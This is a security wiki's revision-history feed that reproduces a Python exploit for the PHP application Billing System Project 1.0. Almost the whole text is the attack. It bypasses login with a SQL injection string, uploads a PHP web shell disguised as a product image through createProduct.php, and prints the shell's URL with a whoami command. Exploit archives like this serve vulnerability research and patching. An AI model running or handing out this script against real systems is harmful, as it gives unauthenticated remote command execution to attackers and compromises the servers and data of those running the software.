https://pwnwiki.com/index.php?action=history&feed=atom&title=Billing_System_Project_1.0_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
Billing System Project 1.0 遠程命令執行漏洞 - Revision history
2026-04-13T18:54:54Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Billing_System_Project_1.0_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=6429&oldid=prev
Pwnwiki: Created page with "<pre> # Exploit Title: Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 06.07.2021 # Exploit Author: Talha DEMİRSOY # Software Link: https:/..."
2021-07-07T02:53:08Z
<p>Created page with "<pre> # Exploit Title: Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 06.07.2021 # Exploit Author: Talha DEMİRSOY # Software Link: https:/..."</p>
<p><b>New page</b></p><div><pre><br />
# Exploit Title: Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated)<br />
# Date: 06.07.2021<br />
# Exploit Author: Talha DEMİRSOY<br />
# Software Link: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html<br />
# Version: V 1.0<br />
# Tested on: Linux & Windows<br />
<br />
import requests<br />
import random<br />
import string<br />
from bs4 import BeautifulSoup<br />
<br />
let = string.ascii_lowercase<br />
shellname = ''.join(random.choice(let) for i in range(15))<br />
randstr = ''.join(random.choice(let) for i in range(15))<br />
<br />
payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd =<br />
($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"<br />
<br />
url = input("Target : ")<br />
<br />
session = requests.session()<br />
<br />
reqUrl = url + "login.php"<br />
reqHead = {"Content-Type": "application/x-www-form-urlencoded"}<br />
reqData = {"username": "admin' or '1'='1'#", "password": "-", "login": ''}<br />
session.post(reqUrl, headers=reqHead, data=reqData)<br />
<br />
print("Shell Uploading...")<br />
<br />
reqUrl = url + "php_action/createProduct.php"<br />
reqHead = {"Content-Type": "multipart/form-data;<br />
boundary=----WebKitFormBoundaryOGdnGszwuETwo6WB"}<br />
reqData =<br />
"\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:<br />
form-data;<br />
name=\"currnt_date\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:<br />
form-data; name=\"productImage\";<br />
filename=\""+shellname+".php\"\r\nContent-Type:<br />
application/octet-stream\r\n\r\n"+payload+"\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:<br />
form-data;<br />
name=\"productName\"\r\n\r\n"+randstr+"_TalhaDemirsoy\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:<br />
form-data;<br />
name=\"quantity\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:<br />
form-data;<br />
name=\"rate\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:<br />
form-data;<br />
name=\"brandName\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:<br />
form-data;<br />
name=\"categoryName\"\r\n\r\n2\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:<br />
form-data;<br />
name=\"productStatus\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:<br />
form-data;<br />
name=\"create\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB--\r\n"<br />
session.post(reqUrl, headers=reqHead, data=reqData)<br />
<br />
print("product name is "+randstr)<br />
print("shell name is "+shellname)<br />
<br />
reqUrl = url + "product.php"<br />
data = session.get(reqUrl)<br />
<br />
parser = BeautifulSoup(data.text, 'html.parser')<br />
find_shell = parser.find_all('img')<br />
<br />
for i in find_shell:<br />
if shellname in i.get("src"):<br />
print("Shell URL : " + url + i.get("src") + "?cmd=whoami") <br />
</pre></div>
Pwnwiki